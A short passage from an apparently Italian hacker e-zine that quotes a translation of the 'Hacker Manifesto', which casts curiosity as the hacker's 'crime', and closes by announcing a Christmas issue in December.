nostro be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poi siamo noi i crimin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, io sono un criminale. Il mio crimine e' la mia curiosit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mio crimine e' quello che i giurati pensano e sanno non quello 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a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mio crimine e' quello di scovare qualche vostro segreto, qualcosa che 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fara' mai dimenticare il mio n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 sono un hacker e questo e' il mio manifesto. Potete anche fermare me, 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 potete fermarci tutti...dopo tutto, siamo tutti ugua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 risentiamo a dicembre con il numero natalizio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